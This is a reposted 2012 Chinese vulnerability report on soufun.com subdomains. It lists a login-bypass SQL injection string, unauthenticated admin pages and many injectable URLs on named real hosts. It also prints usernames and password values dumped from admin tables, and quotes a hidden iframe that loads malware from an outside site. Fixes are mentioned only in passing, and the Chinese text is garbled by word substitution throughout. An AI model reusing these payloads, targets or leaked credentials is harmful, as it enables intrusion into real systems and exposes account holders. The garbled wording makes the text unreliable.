安全黑客
当前位置:安全黑客文章资讯安全技术安全检测
日期:2012-03-23 09:24:00  来源:本站整理

搜房网某个分站后台管理考证绕过和sql注入攻击[安全检测]

赞助商链接



  本文“搜房网某个分站后台管理考证绕过和sql注入攻击[安全检测]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

扼要描写:搜房网某分站后台管理可绕过考证
具体阐明:http://dg.soufun.com/market/zhongjie/admin/
1.登录框SQL注入,可构造查询语句绕过考证,如:'or''=''or''='
2.未受权拜候:
http://dg.soufun.com/market/zhongjie/admin/news.asp
http://dg.soufun.com/market/zhongjie/admin/com.asp
3.有页面存在SQL注入,可获得管理员帐号密码
http://dg.soufun.com/market/zhongjie/showcom.asp?id=23
漏洞证明:'or''=''or''='直接登录,
未受权拜候:
http://dg.soufun.com/market/zhongjie/admin/news.asp
http://dg.soufun.com/market/zhongjie/admin/com.asp
SSQL注入:http://dg.soufun.com/market/zhongjie/showcom.asp?id=23
 
 
 

 
 
 
修复筹划:过滤参数,对未受权拜候页面增添考证
此后台应当已经废弃,可以删除


扼要描写:搜房网多个页面存在SQL注入
具体阐明:多个页面存在SQL注入,有的数据库里的内容+多个SQL注入+注入后进的多个后台就值20Rank了.
多个分站,多个页面,多个参数过滤不当招致多个SQL注入,多个数据库里的管理密码未加密
假如一个SQL至少3rank的话,我看可以轻松过50rank.
主站包含分站过50%带有SQL查询语句的ASP程序存在注入,ASPX与PHP对比少.
有的页面已经被嵌入恶意内容.
保守预计网站被入侵的概率约为80%,倡议对网站包含分站举行一次大查抄删除不需求的垃圾页面和程序.
 
漏洞证明:http://cq.soufun.com/cqfjh/manage/findkfs.asp?realid=59
http://cq.soufun.com/cqfjh/manage/findoneloupan.asp?houseid=65
http://dg.soufun.com/market/zhongjie/showcom.asp?id=23
http://suzhou.soufun.com/market/lijingyuan/zxdt_xianshi.asp?id=10
http://shdesign.soufun.com/mj/shenggao/showitem.asp?id=11
http://shdesign.soufun.com/hy/08/jindi01/shownews.asp?id=90
http://esf.sz.soufun.com/asp/zhaoping/oneseeker.asp?id=42364
http://nb.soufun.com/ad/zzk/zpxx/zp_more.asp?ypid=212
http://changchun.soufun.com/market/article/list.asp?articleid=65
http://cs.soufun.com/market/eles/news_view.asp?newsid=92
admin www.110hack.com
id|pass|user|
1|8370396|changsha_newhouse|
http://bj.soufun.com/market/yueguizhuangyuan/news/view.asp?id=5
admin
id|password|username|
9|27c8f0e73f4d7f48|admin|
11|b3506677e4c55e91|zhang|
 
...
 
实在太多了
修复筹划:对网站举行一次大查抄删除不需求的垃圾页面和程序.
过滤参数

分站http://cs.soufun.com/下的多个页面被插入恶意内容,并存在SQL注入
比方:http://cs.soufun.com/market/eles/news_view.asp?newsid=92
含有有恶意软件的网站的框架衔接
 
<iframe src="http://www.gzlyqyjt.com/inc/" width='0' height='0'></iframe>
 
...
并且此分站下的多个页面存在SQL注入,包含上面的链接.
 
漏洞证明:恶意内容:
 
 
 

 
 SQL注入:
表:admin
表段:id|pass|user|
数据:1|8*****6|changsha_newhouse|
修复筹划:删除不需求的程序,过滤参数,删除恶意代码...


  以上是“搜房网某个分站后台管理考证绕过和sql注入攻击[安全检测]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • 搜房网某个分站后台管理考证绕过和sql注入攻击
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .